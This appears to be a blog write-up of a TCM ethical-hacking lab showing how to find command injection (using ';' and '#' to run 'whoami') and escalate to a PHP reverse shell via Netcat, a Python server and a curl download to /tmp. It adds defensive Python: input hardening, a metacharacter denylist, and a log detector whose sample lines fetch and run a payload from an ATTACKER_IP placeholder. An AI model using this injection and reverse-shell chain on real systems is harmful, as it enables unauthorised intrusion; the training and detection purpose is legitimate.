TCM Practical Ethical Hacking — Command Injection 0x01 Reverse Shell
This is my thought process of first identifying command injection in the first lab in the command injection series, then further using that command injection to establish a reverse shell to the target system!
§ Identifying Command Injection
To start off, we simply test the web application's normal functionality. We do this to understand how it is supposed to behave before we begin testing for a command injection vulnerability.
Since this is a lab, we can see the command actually executed on the target system, something a real application would rarely expose.
We can see that our input, “127.0.0.1”, was inserted into a predefined command: “curl -I -s -L {user input} | grep "HTTP/"”. Knowing this lets us determine where to test for command injection and how to break out of the command being executed.
There are multiple shell metacharacters that can be used to chain several commands into a single command line; this is a list of the most common ones:
- &, &&, |, ||, ;, \n, `, $()
Now, let's test one of them to run a “whoami” command on the target system:
It did not work, and here is why: after our user-supplied input there is another command that interferes with the final response, namely | grep “HTTP/”.
There is a way to prevent this part of the command from running, namely the hash (#) character. The shell treats everything after a hash as a comment, so nothing that follows it is executed.
Let's try including the hash character in our user-supplied input:
After adding the hash character to our input we can see that the “whoami” command successfully runs and its output is returned in the response. We have now successfully identified command injection in this web application.
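From the defender's side, the root cause is that user input is spliced into a shell command string. The following Python example is added here and is not code from the lab or from TCM; it rebuilds the lab's command by concatenation (returned, never executed) to show what the shell would receive, checks input against the metacharacter list from this post, and shows the hardened alternative: a strict hostname/IP allowlist and an argv list handed to curl with no shell involved. The function names, the regex and the use of Python instead of the lab's PHP are my own assumptions.

```python
import re
import subprocess

# The separators listed in the post, plus '#' (the comment character used to
# drop the trailing "| grep" stage). Any of these in a host field is a red flag.
SHELL_METACHARS = ("&", "|", ";", "\n", "`", "$(", "#")

# Hostname labels or IPv4 octets only: no spaces, no metacharacters, and no
# leading '-' so the value can never be parsed by curl as an option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}")


def build_command_vulnerable(user_input: str) -> str:
    """The lab's pattern: user input concatenated into a shell string.

    Only returned, never executed; it exists to show what /bin/sh would see."""
    return f'curl -I -s -L {user_input} | grep "HTTP/"'


def contains_shell_metachar(user_input: str) -> bool:
    """Cheap denylist pre-check, useful for alerting; not a substitute for safe_argv."""
    return any(m in user_input for m in SHELL_METACHARS)


def safe_argv(user_input: str) -> list[str]:
    """Allowlist validation plus an argv list: no shell, so metacharacters mean nothing.

    Raises ValueError instead of silently stripping, so attempts stay visible in logs."""
    if _HOST_RE.fullmatch(user_input) is None:
        raise ValueError(f"rejected target: {user_input!r}")
    # '--' ends curl's option parsing; belt and braces on top of the regex.
    return ["curl", "-I", "-s", "-L", "--", user_input]


def fetch_status_lines(user_input: str) -> list[str]:
    """Hardened equivalent of the lab's pipeline: run curl without a shell and
    do the 'grep HTTP/' step in Python. Needs network access, so unused offline."""
    out = subprocess.run(safe_argv(user_input), capture_output=True, text=True, timeout=10)
    return [line for line in out.stdout.splitlines() if line.startswith("HTTP/")]


if __name__ == "__main__":
    for probe in ("127.0.0.1", "127.0.0.1; whoami #", "-o/tmp/x"):
        try:
            print(probe, "->", safe_argv(probe))
        except ValueError as exc:
            print(probe, "->", exc, "| metachar seen:", contains_shell_metachar(probe))
```

The important design choice is that validation rejects rather than sanitises: stripping characters silently hides the attempt, while a ValueError can be logged and alerted on, and the argv form means even a value that slips past the regex is never interpreted by a shell.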
§ Establishing Reverse Shell
Getting command injection to work essentially means that we have Remote Code Execution (RCE) on the target system. This also means that we can go a step further and establish a reverse shell. The following are the steps I took to get a reverse shell:
• Step 1 — Reverse Shell Payload
I usually use a site called revshells.com to get all kinds of different reverse shell payloads; the one I use here is called “PHP PentestMonkey”. You simply replace the placeholder IP address and port in the PHP script with your machine's IP address and the port you are going to use with Netcat to listen for incoming connections.
• Step 2 — Netcat Listener
We are now going to start a Netcat listener using the port we specified in the PHP reverse shell script we just modified:
• Step 3 — Python HTTP Server
We are going to abuse the fact that we already have RCE on the target system by downloading our PHP reverse shell script onto it.
For that, we are going to start a simple Python HTTP server in the directory where we saved our PHP reverse shell script:
• Step 4 — Downloading Reverse Shell
Now that our Python HTTP server is up and running, we are going to use the curl command on the target system to download the PHP reverse shell file from our system:
We can now verify that our PHP reverse shell has been downloaded to the /tmp directory by listing the files from that directory:
• Step 5 — Establishing Reverse Shell
All there is left to do is to execute this PHP file on the target system:
It will look like nothing happened at first glance, and the web application will just keep loading. But if we go back to the Netcat listener we started in step 2, we can see that we have established a connection from the target system:
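For detection, the whole chain above leaves a trace in the web server's access log: the same parameter receives a command separator, a # to truncate the command, a fetch into /tmp and then an interpreter run against /tmp. The following Python example is added here and is not part of the original post; the access-log lines are constructed to mirror those steps (the /ping path, the host parameter, the rev.php name and the ATTACKER_IP placeholder are all assumptions), and the rule names are my own. It decodes the query before matching, since %23 and + hide the characters in the raw request line.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log lines, not taken from the lab. They model
# the post's sequence through one vulnerable parameter: a benign request, the
# whoami probe with '#', a fetch into /tmp, execution from /tmp, then a benign
# request from another client. ATTACKER_IP is a placeholder.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 312
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /ping?host=127.0.0.1;whoami+%23 HTTP/1.1" 200 198
10.10.14.5 - - [01/Jan/2024:10:00:31 +0000] "GET /ping?host=127.0.0.1;curl+http://ATTACKER_IP:8000/rev.php+-o+/tmp/rev.php+%23 HTTP/1.1" 200 187
10.10.14.5 - - [01/Jan/2024:10:00:40 +0000] "GET /ping?host=127.0.0.1;php+/tmp/rev.php+%23 HTTP/1.1" 200 0
10.10.14.9 - - [01/Jan/2024:10:01:02 +0000] "GET /ping?host=example.com HTTP/1.1" 200 340
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The separator set from the post plus '#', matched on the decoded value.
METACHAR_RE = re.compile(r"[&|;`\n#]|\$\(")
FETCH_TO_TMP_RE = re.compile(r"\b(?:curl|wget)\b.*/tmp/")
EXEC_FROM_TMP_RE = re.compile(r"\b(?:php|sh|bash|python3?|perl)\s+/tmp/")


def parse_query(query: str):
    """Manual query parsing so ';' inside a value is never treated as a pair separator."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def classify_value(value: str) -> set[str]:
    """Tags one decoded parameter value; the chain tags only fire alongside a separator."""
    tags = set()
    if METACHAR_RE.search(value):
        tags.add("shell_metachar")
        if "#" in value:
            tags.add("comment_truncation")
        if FETCH_TO_TMP_RE.search(value):
            tags.add("download_to_tmp")
        if EXEC_FROM_TMP_RE.search(value):
            tags.add("exec_from_tmp")
    return tags


def scan_log(text: str) -> list[dict]:
    """Returns one finding per flagged parameter, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in parse_query(urlsplit(m["target"]).query):
            tags = classify_value(value)
            if tags:
                findings.append({"client": m["client"], "time": m["ts"],
                                 "param": name, "value": value, "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["param"], f["tags"], repr(f["value"]))
```

Three findings from the same client within a minute, escalating from a probe to a download and then execution from /tmp, is the pattern worth alerting on; a single metacharacter hit on its own may be a false positive, but the download_to_tmp and exec_from_tmp tags are rarely benign in a host parameter.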
Hope this helped, thanks for reading!